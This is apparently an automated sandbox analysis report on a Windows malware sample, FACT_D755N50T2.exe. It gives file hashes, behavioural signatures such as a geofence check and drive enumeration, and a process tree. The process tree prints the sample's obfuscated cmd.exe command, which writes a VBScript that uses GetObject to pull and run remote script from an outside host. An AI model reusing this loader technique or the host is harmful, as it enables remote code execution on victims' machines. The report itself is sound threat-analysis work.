Analysis
-
max time kernel
30s -
max time network
35s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
07-04-2023 00:44
Static task
static1
Behavioral task
behavioral1
Sample
FACT_D755N50T2.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
FACT_D755N50T2.exe
Resource
win10v2004-20230221-en
Behavioral task
behavioral3
Sample
~.exe
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
~.exe
Resource
win10v2004-20230220-en
General
-
Target
FACT_D755N50T2.exe
-
Size
1.5MB
-
MD5
35e24a8ce72dd5360fc826947abfdc10
-
SHA1
929e014f9d6271ae3ce82d5dadcd674631c9c779
-
SHA256
d0fbbba4a32cf5156daf563e6fa9b2133cc11b85a7a2632411eb7195ab35e9c7
-
SHA512
558bc4ac4c9da60fea107037789cfa7cb0cbe10829687bf50f71afb0cfa51bc74f5d5f478c59914e8e55f5b6bd4d9e487a3b1286327491189aa5e90f0c38cf4e
-
SSDEEP
24576:Z6Ykri0w6Hf0PjnVlYI5YALlgKPlDQKimQn+IZQaL89V6pZE1rrrrrrrrrrrrrrl:pKw6/0zVlYIqXKNKmGZXgZpO8
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 22 2768 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings cmd.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
FACT_D755N50T2.execmd.execmd.execmd.exedescription pid process target process PID 3680 wrote to memory of 2292 3680 FACT_D755N50T2.exe cmd.exe PID 3680 wrote to memory of 2292 3680 FACT_D755N50T2.exe cmd.exe PID 3680 wrote to memory of 2292 3680 FACT_D755N50T2.exe cmd.exe PID 2292 wrote to memory of 2884 2292 cmd.exe cmd.exe PID 2292 wrote to memory of 2884 2292 cmd.exe cmd.exe PID 2292 wrote to memory of 2884 2292 cmd.exe cmd.exe PID 2884 wrote to memory of 4208 2884 cmd.exe cmd.exe PID 2884 wrote to memory of 4208 2884 cmd.exe cmd.exe PID 2884 wrote to memory of 4208 2884 cmd.exe cmd.exe PID 4208 wrote to memory of 2768 4208 cmd.exe WScript.exe PID 4208 wrote to memory of 2768 4208 cmd.exe WScript.exe PID 4208 wrote to memory of 2768 4208 cmd.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FACT_D755N50T2.exe"C:\Users\Admin\AppData\Local\Temp\FACT_D755N50T2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c %ComSpec% /V/D/c "echo on0=".":mr9=":":e34="/":GetObject("scripT"+mr9+"https"+mr9+"//simeone"+on0+"bounceme"+on0+"net/dhy5hwr1")>%Public%\re9.vBs&&%ComSpec% /c start %Public%\re9.vBs"2⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /V/D/c "echo on0=".":mr9=":":e34="/":GetObject("scripT"+mr9+"https"+mr9+"//simeone"+on0+"bounceme"+on0+"net/dhy5hwr1")>C:\Users\Public\re9.vBs&&C:\Windows\system32\cmd.exe /c start C:\Users\Public\re9.vBs"3⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Public\re9.vBs4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\re9.vBs"5⤵
- Blocklisted process makes network request
PID:2768
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
107B
MD5e7a1b7f622c413b656bd350365edaef2
SHA1e769ca533dd368bb6d341e7a57c002dc6e07a289
SHA256c0fd93d1266613402380c5f3888fe5df73103d25b6d4c848252221b06a749dbb
SHA512b0b3871ced3eae994d050746610dc67bb02b6a8454c6fa826aec8cfdd3a0d8fe21c5e9fe44667f2c5ca85f80712006ff3fe9f08bb2694ae2a0d857e344afb861